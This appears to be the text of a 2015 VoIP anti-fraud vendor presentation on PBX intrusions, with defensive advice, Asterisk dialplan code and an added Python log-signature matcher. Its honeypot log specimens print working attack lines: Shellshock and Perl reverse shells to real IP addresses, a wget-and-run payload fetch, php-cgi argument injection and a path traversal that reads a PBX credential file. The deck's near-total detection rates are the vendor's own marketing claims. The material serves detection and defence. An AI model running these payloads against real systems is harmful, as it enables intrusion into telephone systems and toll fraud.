Date posted: 14-Jul-2015
About me
Flavio E. Goncalves
CTO of SipPulse (www.sippulse.com)
Turnkey solutions for VoIP providers and Telcos.
Anti-Fraud Solutions
Why are they doing it?
#1 Allocate a number and a recording in a PRN provider
#2 Find a vulnerable device (using Shodan)
#3 Make calls and cash your money
Distribution by country
US: 117636
FR: 105603
DE: 78656
PS: 32795
RU: 11910
TW: 11120
SC: 10702
SG: 3736
GB: 2836
CA: 1978
TOP 5 PBX Exploits in September/October
1. Shellshock
2. PHP/LAMP Injection
3. SQL injection in Trixbox
4. Linksys remote code execution
5. FreePBX Remote Code Execution
#1 Shellshock
• Exploit Date: 09/2014
Specimen:
• [26/Sep/2014:13:13:57 +0000] "GET / HTTP/1.0" 200 414 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'"
• [26/Sep/2014:13:16:54 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 507 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'"
#2 SQL injection in Trixbox
• Exploit Date: 03/2014 - http://www.exploit-db.com/exploits/32239/
Specimen:
• [25/Sep/2014:23:52:29 +0000] "GET /web-meetme/conf_cdr.php?bookId=1 HTTP/1.1" 404 485 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
#3 Linksys Remote Code Execution
• Exploit Date: 02/2014 - http://www.exploit-db.com/exploits/31683/
Specimen:
• [25/Sep/2014:12:50:16 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 538 "-" "-"
#4 LAMP Attacks
• Apache/PHP Remote Exploit
• Exploit date: 10/2013
• Specimen:
• POST /cgi-bin/php5?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
• [26/Sep/2014:15:43:38 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25“
#5 CallMeNum (Demo)
• Exploit date: 03/2012
• Specimen:
• GET /recordings/misc/callme_page.php?action=c&callmenum=888@ext-featurecodes/n
• Application: system
• Data: perl -MIO -e '$p=fork;exit,if($p); $c=new IO::Socket::INET(PeerAddr,"x.y.z.w:4446"); STDIN->fdopen($c,r); $~->fdopen($c,w); $c->write("]QAfH#.Eq\ncmp\n"); system$_ while<>;'
Unknown Exploits
• Jul/2014
• Specimen:
• [03/Jul/2014] "GET /recordings/locale/sv_SE/LC_MESSAGES/LC/index.php
• [03/Jul/2014] "GET /fuxkkk.php
• [03/Jul/2014] "GET /recordings/theme/alexpass.php
How hackers are getting into your PBX
• #1 – SIP brute force (Fail2ban is effective)
• #2 – HTTP exploitation
• #3 – Attacks on phones
• #4 – Caller ID spoofing
• #5 – Billing/credit card fraud
Part III – How to defend
#1 Patching Everything and Upgrade frequently
#2 Use a Firewall
#3 Use a Session Border Controller
#4 Use Encryption
#5 Use an Anti-Fraud System
#2 Use a firewall or properly configure iptables
• Effectiveness: High
• Risk: Medium
• Cost: Low
• Absolutely a must do. At least: no Internet access to SSH, no Internet access to HTTP/HTTPS.
• Does not prevent attacks on phones
#4 Use encryption
• Effectiveness: Medium
• Risk: Medium
• Cost: High if you intend to do mutual authentication
#5 Use an AntiFraud System
• Effectiveness: High
• Risk: Very Low
• Cost: Medium
• Comments: Can detect 99.999% of the attacks; it protects against caller ID spoofing, social engineering and phone attacks.
• Limitations: Firewall restrictions are required to prevent tampering with the anti-fraud rules.
Working Together in 2 steps
1. Make sure your customer’s firewall and fail2ban are configured correctly (You)
2. Partner with us to use TFPS on your customers (Us)
How effective is an Anti-Fraud Solution?
• 99.989% just by protocol signature.
• Number obtained by comparing the attacks registered on the honeypot against the rules.
Anti-Fraud Effectiveness (chart: detected vs. undetected attacks)
1. 99.89% of the attacks prevented by signature detection
2. Collaborative protection. One PBX hacked automatically blocks the IP for the others
3. Mechanism: SIP Redirect
• No additional hardware required.
• Available for OpenSIPS/FreeSWITCH/Asterisk
www.tfps.co || tfps.sippulse.com
Asterisk Code

[from-internal] ; Set here the context for your users
; FPS for international calls
exten => _011[1-9].,1,Set(ip=${CHANNEL(recvip)})
 same => n,SIPAddHeader(P-Received: ${ip})
 same => n,Set(ua=${CHANNEL(useragent)})
 same => n,SIPAddHeader(P-UA: ${ua})
 same => n,Set(GROUP()=fps)
 same => n,Set(ncalls=${GROUP_COUNT(fps)})
 same => n,SIPAddHeader(P-Calls: ${ncalls})
 same => n,Set(_original=${EXTEN})
 same => n,Dial(SIP/fps/${EXTEN:2})

Asterisk Code

[fps]
; For calls not approved
exten => _R.,1,Answer()
 same => n,Playback(unauthorized) ; (Customize here to generate an error message)
 same => n,Hangup(21)
; For calls approved
exten => _A.,1,Answer()
 same => n,Dial(SIP/provider/${original}) ; (Customize here to send the call ahead)
 same => n,Hangup(16)
Compared to other anti-fraud solutions
• Pluggable
• No Additional Hardware
• Small traffic to be analyzed
• Small risk, only a few calls can be affected.
• Easy handling of outages
Thank You!
• e-mail: [email protected]
• skype: flaviogoncalves1
• Twitter: @asteriskguide
• blog.tfps.co
#6 FreePBX 2.x Code Execution
• Specimen:
• [03/Jul/2014:17:28:41 +0000] "GET /admin/config.php?display=auth&handler=api&function=system&args=cd%20/tmp;rm%20-f%20e;wget%20http://93.170.130.201:3003/e;perl%20e;rm%20-f%20e HTTP/1.1" 404 534 "-" "-"
#4 Vtiger Exploit (lots of variations)
• 0001189: Vtiger CRM - php inject vulnerability
• Specimen:
• 108.175.157.211 - - [25/Jul/2014:19:28:59 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..//etc/amportal.conf%00 HTTP/1.1" 404 574 "-" "-"
• 93.170.130.201 - - [03/Jul/2014:21:15:11 +0000] "POST /vtigercrm/graph.php?module=..%2Fmodules%2FSettings&action=savewordtemplate HTTP/1.1" 404 537 "-" "-"
#4 PHP Code Injection Vulnerability
• Specimen:
• [03/Jul/2014:13:57:37 +0000] "GET /admin/footer.php?php=info&ip=perl%20-MIO%20-e%20%27%24p%3Dfork%3Bexit%2Cif(%24p)%3B%20%24c%3Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%2293.170.130.201%3A3333%22)%3B%20STDIN-%3Efdopen(%24c%2Cr)%3B%20%24~-%3Efdopen(%24c%2Cw)%3B%20%24c-%3Ewrite(%22%5DQAfH%23.Eq%5Cnunk%5Cn%22)%3B%20system%24_%20while%3C%3E%3B%27 HTTP/1.1" 404 534 "-" "-"
• "GET /admin/footer.php?php=info&ip=perl -MIO -e '$p=fork;exit,if($p); $c=new IO::Socket::INET(PeerAddr,"93.170.130.201:3333"); STDIN->fdopen($c,r); $~->fdopen($c,w); $c->write("]QAfH#.Eq\nunk\n"); system$_ while<>;'
#9 FreePBX Extension Dump Exploitation
• Specimen:
• 184.105.240.203 - - [08/Jul/2014:01:33:42 +0000] "POST /admin/cdr/call-log.php?handler=cdr&s=&t=&order=calldate&sens=DESC&current_page=0/admin/cdr/call-comp.php HTTP/1.1" 404 484 "-" "-"
#6 FreeSWITCH Attacks
GET /freeswitch/app/provision/index.php?mac=df-df-df-df-df-df&template=linksys
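The deck credits most of its detection rate to signature matching. As an added example (not code from the deck or from TFPS), the matcher below applies one regex per specimen family shown on these slides (Shellshock, Trixbox web-meetme, Linksys tmUnblock, php-cgi argument injection, FreePBX callme/config.php, Vtiger traversal) to Apache combined log lines, URL-decoding the request first so the hex-encoded php-cgi variant is caught. The rule names, the sample log lines and the RFC 5737 IP addresses are constructed for this illustration.

```python
import re
from urllib.parse import unquote_plus

# Signature rules for the HTTP exploitation attempts catalogued in the deck.
# Each regex is applied to the URL-decoded request line plus the User-Agent.
SIGNATURES = [
    ("shellshock", re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")),
    ("trixbox-web-meetme-sqli", re.compile(r"/web-meetme/conf_cdr\.php")),
    ("linksys-tmunblock-rce", re.compile(r"/tmUnblock\.cgi")),
    ("php-cgi-arg-injection", re.compile(r"/cgi-bin/php5?\?.*-d\s+allow_url_include")),
    ("freepbx-callmenum", re.compile(r"/recordings/misc/callme_page\.php")),
    ("freepbx-config-system", re.compile(r"/admin/config\.php\?.*function=system")),
    ("freepbx-footer-inject", re.compile(r"/admin/footer\.php\?php=")),
    ("vtiger-traversal", re.compile(r"/vtigercrm/.*(\.\./|\x00)")),
]

# Apache combined log line; the client IP prefix is optional (some specimens lack it).
LOG_RE = re.compile(
    r'^(?:(?P<ip>\S+) \S+ \S+ )?\[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

def classify(line):
    """Return (rule, client_ip, raw_request) for a matching line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode before matching so %2D%64 / %00 style obfuscation is caught.
    haystack = unquote_plus(m["req"]) + " " + unquote_plus(m["ua"])
    for rule, rx in SIGNATURES:
        if rx.search(haystack):
            return rule, m["ip"] or "-", m["req"]
    return None

def offending_ips(lines):
    """Unique client IPs that triggered any rule (candidates for a block list)."""
    hits = {res[1] for res in map(classify, lines) if res and res[1] != "-"}
    return sorted(hits)

# Constructed sample log modelled on the deck's specimens (RFC 5737 addresses, payloads reduced).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Sep/2014:13:13:57 +0000] "GET / HTTP/1.0" 200 414 "-" "() { :;}; echo probe"',
    '192.0.2.11 - - [25/Sep/2014:23:52:29 +0000] "GET /web-meetme/conf_cdr.php?bookId=1 HTTP/1.1" 404 485 "-" "curl/7.19.7"',
    '192.0.2.12 - - [25/Sep/2014:12:50:16 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 538 "-" "-"',
    '192.0.2.13 - - [26/Sep/2014:15:43:38 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0"',
    '192.0.2.14 - - [25/Jul/2014:19:28:59 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../etc/amportal.conf%00 HTTP/1.1" 404 574 "-" "-"',
    '192.0.2.10 - - [03/Jul/2014:17:28:41 +0000] "GET /admin/config.php?display=auth&handler=api&function=system&args=id HTTP/1.1" 404 534 "-" "-"',
    '198.51.100.7 - - [26/Sep/2014:10:00:00 +0000] "GET /admin/config.php?display=extensions HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]
```

The last sample line is a legitimate FreePBX admin request and yields None, which is the false-positive check a signature set like this needs before its output is fed to iptables or fail2ban.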
#4 Caller ID Spoofing
• 1 - Send 1 million calls and cancel
• 2 - Fake the callerID to a PRN
• 3 - Wait for the call back.
Open Source is a Target!
• We are seeing scans for:
• Vicidial
• Astpp
• phpMyAdmin (hot)
• Tomcat
• Jboss
• FreeSWITCH
First way to protect
1. Make sure your system is protected by a firewall
   1. Vulnerability scan
   2. Apply firewall rules to prevent unauthorized access to the server
   3. Use .htaccess and implement dual authentication
#5 Recent SIP Phone Vulnerabilities (CVSS score in parentheses)
• Cisco 3905 - http://www.cvedetails.com/cve/CVE-2014-0721/ (10)
• Cisco SPA 3XX, 5XX http://www.cvedetails.com/cve/CVE-2014-3313/ (4.3)
• Cisco SPA 3XX, 5XX http://www.cvedetails.com/cve/CVE-2014-3312/ (6.9)
• Yealink - http://www.cvedetails.com/cve/CVE-2014-3427
• Yealink - http://www.cvedetails.com/cve/CVE-2014-3428/